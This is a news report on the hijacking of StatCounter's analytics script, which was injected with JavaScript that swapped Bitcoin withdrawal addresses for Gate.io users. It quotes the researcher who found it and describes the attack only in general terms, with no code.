Security breach at StatCounter

Hackers compromised this tool to hijack Bitcoin transactions on the Gate.io platform

Digital forensics specialists from the International Institute of Cyber Security report a security breach at StatCounter, one of the largest web analytics platforms on the Internet. During the attack, hackers injected malicious code into the tracking script on the company’s main site.

According to Matthieu Faou, a researcher on cybersecurity, malware and digital forensics, the malicious code used in the attack are capable of hijacking Bitcoin transactions made through the web interface of the cryptocurrency exchange Gate.io.

“We contacted the StatCounter operators but they haven’t responded yet”, said Faou in a safety notice. “The JavaScript file in http://www.statcounter[.]com/counter/counter.js is still compromised”.

The investigator mentions that the malicious code was first added to this StatCounter script sometime last weekend, specifically on Saturday, November 3rd. The code is still active, as the investigator shows through some site’s screenshots.

statcounterscreen

This JavaScript file is the cornerstone of the StatCounter analysis service, companies load this script on their sites to track visits and review traffic history. As cybersecurity and digital forensics specialists report, there are now more than 680k websites loading the company’s tracking script.

But according to Faou, none of these companies have to worry, at least for now. This is because the malicious code inserted in the StatCounter site tracking script is only addressed to users of a site: the cryptocurrency exchange platform Gate.io.

The investigator says that the malicious code is seen in the current URL of the page and will not be activated unless the page link contains the path ‘MyAccount/remove/BTC’. Faou says that the only website that identified this URL pattern was Gate.io, an important cryptocurrency exchange platform, currently ranked 39 in the CoinMarketCap classification.

The URL to which malicious code is addressed is part of a user’s account control panel and, more specifically, is the URL of the page where users make Bitcoin transfers. The investigator considers that the mission of the malicious code is to secretly replace any Bitcoin address that the users enter on the page by one controlled by the attacker.

“A different Bitcoin address is used for each victim. We could not find the main Bitcoin address of the attackers, therefore we could not pivot on the blockchain transactions and find related attacks”, said Faou, suggesting that it is still impossible to determine the amount of Bitcoin that the group could have stolen so far.

Although it has refused to make any statements regarding this incident, Gate.io has already removed the StatCounter script from its website. Nevertheless, there are still unresolved questions regarding the number of Gate.io users who might have been affected by this security incident, as well as the steps that this platform could take to compensate them.

This is the latest incident in a long list of attacks against supply chains via third-party JavaScript code loaded into legitimate sites. In the past years, threat actors have hacked into several online services to load cryptocurrency mining scripts into the browser or payment card skimming codes of unsuspecting users.